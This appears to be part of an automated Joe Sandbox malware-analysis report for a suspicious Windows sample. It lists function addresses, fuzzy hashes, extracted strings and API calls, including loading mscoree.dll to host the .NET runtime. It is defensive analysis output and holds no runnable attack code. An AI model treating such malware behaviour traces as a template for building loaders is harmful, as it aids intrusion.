Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: dcc36566893298b3aa0c8f0c433f989bcf173dd712984c78a1a3356108b5d492
Instruction ID: cf9a23ed1c9ca71473302ff21d04c27dba4fa111840ab99c2467ad2d40a32c04
Opcode Fuzzy Hash: dcc36566893298b3aa0c8f0c433f989bcf173dd712984c78a1a3356108b5d492
Instruction Fuzzy Hash: EEF01276208205FAEB016A909D91A6D3228AB44755F348437B613790F1D57D8A52A62B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004022D5 Relevance: 1.4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

r, xrefs: 0040232A

Memory Dump Source

Source File: 00000000.00000002.1676446857.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1676432435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676461515.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676475835.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uVQLD8YVk6.jbxd

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: 01b96b65cfdcd90c1c397b9403299f682ee15a74256080b1f65cd8ec4d7bfb3c
Instruction ID: 21f26110e6cf775579a99558e1882726b209ec6e36350296178eddc2ef37f111
Opcode Fuzzy Hash: 01b96b65cfdcd90c1c397b9403299f682ee15a74256080b1f65cd8ec4d7bfb3c
Instruction Fuzzy Hash: 9D31227741825156DB1E9A708B8E3E77B27EA133103280077DD50BA6E2C1FD950792BF

Uniqueness

Uniqueness Score: -1.00%

Function 004022D3 Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

r, xrefs: 0040232A

Memory Dump Source

Source File: 00000000.00000002.1676446857.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1676432435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676461515.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676475835.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uVQLD8YVk6.jbxd

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: 469434ee880fbddea0cf341f8ebddacf8018562c28f181a85b7722323595557f
Instruction ID: 1b953951f9e84946fada76b5e7f37c1300e3b6096703083872e6ed5de9378dca
Opcode Fuzzy Hash: 469434ee880fbddea0cf341f8ebddacf8018562c28f181a85b7722323595557f
Instruction Fuzzy Hash: 7E21CB76804211A6DB1C99308B8E7AB7326E7527017680037DE217E6E6C1FD990353BF

Uniqueness

Uniqueness Score: -1.00%

Function 004022EA Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

r, xrefs: 0040232A

Memory Dump Source

Source File: 00000000.00000002.1676446857.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1676432435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676461515.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676475835.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uVQLD8YVk6.jbxd

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: 815d57de8bd47a054c64f16f842a634469d2c4f05e2f076bc91d1185f8b74930
Instruction ID: a74d36b0f1b4ca646719bfef60322b7c2574aac90460d4f31a38f46cbe6a06f4
Opcode Fuzzy Hash: 815d57de8bd47a054c64f16f842a634469d2c4f05e2f076bc91d1185f8b74930
Instruction Fuzzy Hash: 2121B77680421196DB2C9A308B8D2AB6323F7523017280037CE217E6E6C1FD860353BF

Uniqueness

Uniqueness Score: -1.00%

Function 004022F1 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

r, xrefs: 0040232A

Memory Dump Source

Source File: 00000000.00000002.1676446857.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1676432435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676461515.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676475835.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uVQLD8YVk6.jbxd

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: bc449a23bfcb6e081e967bbb03bad2e5856122c8cad518a48a4c09eefedaf789
Instruction ID: 2ad66c17ff4b5c7641e1c3b577f1b688ffb2eaf70282a34240a13484d7da869d
Opcode Fuzzy Hash: bc449a23bfcb6e081e967bbb03bad2e5856122c8cad518a48a4c09eefedaf789
Instruction Fuzzy Hash: 9A21AD768142519ADB1D9A308B8E69F7327E6523053280037CE607E3E6C1FED60683BE

Uniqueness

Uniqueness Score: -1.00%

Function 00402312 Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

r, xrefs: 0040232A

Memory Dump Source

Source File: 00000000.00000002.1676446857.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1676432435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676461515.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676475835.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uVQLD8YVk6.jbxd

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: ec9573f21acbeda1e5adbd331bdd9a66bfdfcae632fd8cf1d44ce58d08a21afe
Instruction ID: d5b1a2e7fd40de28ee2aa7102cdb0648d88445bae2b326fa8fa36a582353ce98
Opcode Fuzzy Hash: ec9573f21acbeda1e5adbd331bdd9a66bfdfcae632fd8cf1d44ce58d08a21afe
Instruction Fuzzy Hash: 8011AB7780021196DB1D9A30D78D29B7323E6523113280033CE207E6E6C1FE960683AD

Uniqueness

Uniqueness Score: -1.00%

Function 00402305 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

r, xrefs: 0040232A

Memory Dump Source

Source File: 00000000.00000002.1676446857.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1676432435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676461515.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676475835.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uVQLD8YVk6.jbxd

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: d070691d41a4b8167cc98d0b2e0bbd4fe351c1b24e9e9887bc8c2df88032fe08
Instruction ID: 36f4b3429da6e91951d3646f31849f315e23384bd4bb7e62adf62cfe0857489e
Opcode Fuzzy Hash: d070691d41a4b8167cc98d0b2e0bbd4fe351c1b24e9e9887bc8c2df88032fe08
Instruction Fuzzy Hash: 5311A877800211AADB1D9A30D78E29B7323E6523113280037CE207E6E6C1FE9A0683AD

Uniqueness

Uniqueness Score: -1.00%

Function 004023C4 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1676446857.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1676432435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676461515.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676475835.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uVQLD8YVk6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd909946fa6d83afe3170f02bd51e94ebfabe704ff8a530d9576cfc491507cb2
Instruction ID: b9f03669d0f109e51e2338ecc83a7c25dad2aa5e152d193297df3b66b623484f
Opcode Fuzzy Hash: cd909946fa6d83afe3170f02bd51e94ebfabe704ff8a530d9576cfc491507cb2
Instruction Fuzzy Hash: 7F41819510A3D679EFC4B0357A865E357C0B553FAC7F07022C976191E3826CA513F217

Uniqueness

Uniqueness Score: -1.00%

Function 004023EE Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1676446857.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1676432435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676461515.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676475835.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uVQLD8YVk6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1313e89f3181827ef5095291014c0f5e08e7cfd477793f9acfe9d8cb8416de5d
Instruction ID: 09e50e7f80b6f240844a7b23185dac68934a4e24aadb5235ff5b6e5f6ae9bb98
Opcode Fuzzy Hash: 1313e89f3181827ef5095291014c0f5e08e7cfd477793f9acfe9d8cb8416de5d
Instruction Fuzzy Hash: CC316DA520A3D639FFC1B43479869E357C0A153FAC7F0B122C63A191B38219A513F207

Uniqueness

Uniqueness Score: -1.00%

Function 004023F6 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1676446857.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1676432435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676461515.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676475835.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uVQLD8YVk6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fec066df9cee890f92d44e47faef8400991d9858c5258831d13e6197af844a5
Instruction ID: 01a0968aa37eb0e973137a0db6cfce193636f6ce6e89c34c4a5cb268a5d0175f
Opcode Fuzzy Hash: 5fec066df9cee890f92d44e47faef8400991d9858c5258831d13e6197af844a5
Instruction Fuzzy Hash: 643169A920A3D639FFC0B43479829E357C0A453FAC7F0B112CA39191B38209A623F217

Uniqueness

Uniqueness Score: -1.00%

Function 00402408 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1676446857.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1676432435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676461515.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676475835.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uVQLD8YVk6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0f8c0a5008f9db7fd65aa19be0258007aa11021050dc4b0505b05876cedb672
Instruction ID: c71be4eb22968519e14ba6c415b3182dc5cb403b38765c14a66933104140d499
Opcode Fuzzy Hash: b0f8c0a5008f9db7fd65aa19be0258007aa11021050dc4b0505b05876cedb672
Instruction Fuzzy Hash: 773148A520A3D639BFC5B43539829E347C0A053FAD3F0B112CA39191B38209A513F217

Uniqueness

Uniqueness Score: -1.00%

Function 004023CF Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1676446857.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1676432435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676461515.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676475835.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uVQLD8YVk6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dfe06143dd8cdd34f95c7aba1b32429ce6e8ba8df23d564ab2c18d4b26a116f
Instruction ID: 48886df60da1b2072515e8b2668d0c5560e49b5b5855dbf375e5abbc9cff86be
Opcode Fuzzy Hash: 9dfe06143dd8cdd34f95c7aba1b32429ce6e8ba8df23d564ab2c18d4b26a116f
Instruction Fuzzy Hash: 593104A524A3E639BFC1B43539869E357C0A457FAC3F0B112CA39191738209A613F217

Uniqueness

Uniqueness Score: -1.00%

Function 00402539 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1676446857.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1676432435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676461515.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676475835.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uVQLD8YVk6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25cce4130b94755a8767b001e81df3067063f7b74c3903dda5e075892b21874c
Instruction ID: 2e7c5a9e02c2513b2b6fcac27f0cbb353f6914b1e0455e18ebe1c9b1b3283f57
Opcode Fuzzy Hash: 25cce4130b94755a8767b001e81df3067063f7b74c3903dda5e075892b21874c
Instruction Fuzzy Hash: 9001FD1810B3A07EEED9AA7002580E767C0BE973547E03C7EC85767A82C916D943F309

Uniqueness

Uniqueness Score: -1.00%

Function 00401410 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1676446857.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1676432435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676461515.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676475835.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uVQLD8YVk6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39fa73a4d1676b38783984c63661d73ea57592dccbd6087f20195cc73c95959d
Instruction ID: 30867e0e19da27295cc2d55c1d093cdb6dcbbeeba6389614a884446845bf4642
Opcode Fuzzy Hash: 39fa73a4d1676b38783984c63661d73ea57592dccbd6087f20195cc73c95959d
Instruction Fuzzy Hash: E1B01205010C05C4A120150C23205D1810BB3C8B01DB0A70131A54B30B0908CE132001

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 4854.exePID: 7792, Parent PID: 2580COMMON

Executed Functions

Function 6CE4B6B0 Relevance: 35.2, APIs: 23, Instructions: 669
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CE4B73F
VariantInit.OLEAUT32(?), ref: 6CE4B748
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CE4B7BE
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CE4B7F5
VariantClear.OLEAUT32(?), ref: 6CE4B801

Part of subcall function 6CE4C850: VariantInit.OLEAUT32(?), ref: 6CE4C88F
Part of subcall function 6CE4C850: VariantInit.OLEAUT32(?), ref: 6CE4C895
Part of subcall function 6CE4C850: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CE4C8A0
Part of subcall function 6CE4C850: SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CE4C8D5
Part of subcall function 6CE4C850: VariantClear.OLEAUT32(?), ref: 6CE4C8E1

VariantClear.OLEAUT32(?), ref: 6CE4BA15
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4BE90
VariantClear.OLEAUT32(?), ref: 6CE4BEA3
VariantClear.OLEAUT32(?), ref: 6CE4BEA9

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateElementVector$Destroy
String ID:
API String ID: 2012514194-0
Opcode ID: 70dc80c58abe5c442ce1e5f65db7548406aa3f4e7a3a1d688426a3101aae4647
Instruction ID: f132ec19c31bdefb5cbf4fc310228769eca225644a729b5ce65a1313c1b6e944
Opcode Fuzzy Hash: 70dc80c58abe5c442ce1e5f65db7548406aa3f4e7a3a1d688426a3101aae4647
Instruction Fuzzy Hash: A9526B75E00618DFDB10DFA8D884BEEBBB5BF89304F248199E509AB751DB30A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 07E50EB3 Relevance: 29.6, Strings: 23, Instructions: 800
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LOOK, xrefs: 07E512E7
p<^q, xrefs: 07E5118D
HERE, xrefs: 07E51AA4
HERE, xrefs: 07E512EC
HERE, xrefs: 07E519F0
Gvq, xrefs: 07E516D2
p<^q, xrefs: 07E51177
LOOK, xrefs: 07E51A9F
HERE, xrefs: 07E50F6F
Gvq, xrefs: 07E514CA
LOOK, xrefs: 07E5158D
Gvq, xrefs: 07E51243
LOOK, xrefs: 07E50F6A
p<^q, xrefs: 07E51142
HERE, xrefs: 07E51592
p<^q, xrefs: 07E5112C
Gvq, xrefs: 07E51CCD
LOOK, xrefs: 07E517E4
Gvq, xrefs: 07E51923
LOOK, xrefs: 07E519EB
LOOK, xrefs: 07E51081
HERE, xrefs: 07E517E9
HERE, xrefs: 07E51086

Memory Dump Source

Source File: 00000004.00000002.1921401699.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e50000_4854.jbxd

Similarity

API ID:
String ID: HERE$HERE$HERE$HERE$HERE$HERE$HERE$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$p<^q$p<^q$p<^q$p<^q$Gvq$Gvq$Gvq$Gvq$Gvq
API String ID: 0-3728642687
Opcode ID: 789ec3a56aec5cfe9ebb0c40e48ca11ef6ceea1f55c23337cdc13400b566f6cf
Instruction ID: 1e18bab3e257814310ef74af3c65b5bf9d41306176ee46278b9116e0f1b82467
Opcode Fuzzy Hash: 789ec3a56aec5cfe9ebb0c40e48ca11ef6ceea1f55c23337cdc13400b566f6cf
Instruction Fuzzy Hash: EC82A2B4E0122D8FDB64DF69C988BD9B7B1AB48310F1481E9D50DAB365DB309E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3B6C0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 245
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(mscoree.dll,CB65479A), ref: 6CE3B711
LoadLibraryW.KERNEL32(mscoree.dll), ref: 6CE3B71C
GetProcAddress.KERNEL32(00000000,CLRCreateInstance), ref: 6CE3B730
__cftoe.LIBCMT ref: 6CE3B870
GetModuleHandleW.KERNEL32(?), ref: 6CE3B88B
GetProcAddress.KERNEL32(00000000,C8F5E518), ref: 6CE3B8D7

Strings

v4.0.30319, xrefs: 6CE3B767
mscoree.dll, xrefs: 6CE3B70C, 6CE3B717
CLRCreateInstance, xrefs: 6CE3B72A

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: AddressHandleModuleProc$LibraryLoad__cftoe
String ID: CLRCreateInstance$mscoree.dll$v4.0.30319
API String ID: 1275574042-506955582
Opcode ID: d2944d90221be2b8172fad9d427565a4cb638e2b6e7b70f22e19a203b75021cd
Instruction ID: 5beb3288ed0f485cabb52e841f5c590b3a916ae27d77a3dc4373fb3ec0073b11
Opcode Fuzzy Hash: d2944d90221be2b8172fad9d427565a4cb638e2b6e7b70f22e19a203b75021cd
Instruction Fuzzy Hash: 24918BB1D056999FCB04DFE8C8809AEBBB4FF48314F20966DE11AEB750D730A906CB55

Uniqueness

Uniqueness Score: -1.00%

Function 07E526F8 Relevance: .5, Instructions: 481COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1921401699.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e50000_4854.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5241a29f4bf54b7a8ea2de669d29d9d0f9a133436be793a0b102b282e5931a04
Instruction ID: a79a9b52d609b328565bffcc32e67dd1e89a9d1efe099e721f9ac51f514b9813
Opcode Fuzzy Hash: 5241a29f4bf54b7a8ea2de669d29d9d0f9a133436be793a0b102b282e5931a04
Instruction Fuzzy Hash: 603291B4E012299FDB64DFA9C890BDDBBB2BF89300F1091AAD549A7354DB305E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 07E526DC Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1921401699.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e50000_4854.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57624d573bf4db0c4edcef0f34aeff65bf17a9e15ae86cbcbe4eda9272a9bf7b
Instruction ID: 738312258fd88286920b12aeae5663e1e2a4b2f14a3ad23e2ca221a26ad6b633
Opcode Fuzzy Hash: 57624d573bf4db0c4edcef0f34aeff65bf17a9e15ae86cbcbe4eda9272a9bf7b
Instruction Fuzzy Hash: 4091E4B4E052189FDB65CFA9C840BDDBBB2BF89300F1481AAD50CAB355DB305A85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0322BDC0 Relevance: 90.7, Strings: 72, Instructions: 688
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 0322C76A
4'^q, xrefs: 0322C55A
4'^q, xrefs: 0322C81A
4'^q, xrefs: 0322C3CE
4'^q, xrefs: 0322C796
4'^q, xrefs: 0322C31E
4'^q, xrefs: 0322C2F2
4'^q, xrefs: 0322C4AA
4'^q, xrefs: 0322C26E
4'^q, xrefs: 0322C009
4'^q, xrefs: 0322C872
4'^q, xrefs: 0322C7EE
4'^q, xrefs: 0322C636
4'^q, xrefs: 0322BE42
4'^q, xrefs: 0322BE88
4'^q, xrefs: 0322C242
4'^q, xrefs: 0322C4D6
4'^q, xrefs: 0322C1F3
4'^q, xrefs: 0322C1AD
4'^q, xrefs: 0322C5DE
4'^q, xrefs: 0322C5B2
4'^q, xrefs: 0322C586
4'^q, xrefs: 0322BF7D
4'^q, xrefs: 0322C2C6
4'^q, xrefs: 0322C60A
4'^q, xrefs: 0322C04F
4'^q, xrefs: 0322C3A2
4'^q, xrefs: 0322BFE6
4'^q, xrefs: 0322BF14
4'^q, xrefs: 0322C072
4'^q, xrefs: 0322BEAB
4'^q, xrefs: 0322C8CA
4'^q, xrefs: 0322C846
4'^q, xrefs: 0322C34A
4'^q, xrefs: 0322BE1F
4'^q, xrefs: 0322C712
4'^q, xrefs: 0322C376
4'^q, xrefs: 0322BEF1
4'^q, xrefs: 0322C52E
4'^q, xrefs: 0322BFA0
4'^q, xrefs: 0322C095
4'^q, xrefs: 0322C426
4'^q, xrefs: 0322C0B8
4'^q, xrefs: 0322C18A
4'^q, xrefs: 0322C29A
4'^q, xrefs: 0322BECE
4'^q, xrefs: 0322C502
4'^q, xrefs: 0322BFC3
4'^q, xrefs: 0322C89E
4'^q, xrefs: 0322C121
4'^q, xrefs: 0322C6E6
4'^q, xrefs: 0322C73E
4'^q, xrefs: 0322BDD9
4'^q, xrefs: 0322C6BA
4'^q, xrefs: 0322BE65
4'^q, xrefs: 0322C8F6
4'^q, xrefs: 0322C47E
4'^q, xrefs: 0322C452
4'^q, xrefs: 0322C02C
4'^q, xrefs: 0322C662
4'^q, xrefs: 0322BF5A
4'^q, xrefs: 0322C68E
4'^q, xrefs: 0322C144
4'^q, xrefs: 0322C3FA
4'^q, xrefs: 0322BF37
4'^q, xrefs: 0322C167
4'^q, xrefs: 0322C7C2
4'^q, xrefs: 0322BDFC
4'^q, xrefs: 0322C0DB
4'^q, xrefs: 0322C0FE
4'^q, xrefs: 0322C1D0
4'^q, xrefs: 0322C216

Memory Dump Source

Source File: 00000004.00000002.1910794254.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3220000_4854.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
API String ID: 0-1605395142
Opcode ID: 86715934699aa573c28369281ecb981b23502d24aceab58e88a145f583b6760c
Instruction ID: 54bd1d6eb9fb393343d4cde50979189ab61b91070f338a53d98c7eb69f172b81
Opcode Fuzzy Hash: 86715934699aa573c28369281ecb981b23502d24aceab58e88a145f583b6760c
Instruction Fuzzy Hash: AF723A70A4111A8FDB1CEF69E955A9CBBB2FF40704F1089ADD049AB268DF705DC98F41

Uniqueness

Uniqueness Score: -1.00%

Function 6CE49357 Relevance: 41.0, APIs: 21, Strings: 1, Instructions: 2492COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CE484BF
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CE484D2
SafeArrayGetElement.OLEAUT32 ref: 6CE4850A
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CE494C1
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CE494D4
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CE4950C
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CE497A4
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CE497B7
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CE497F2

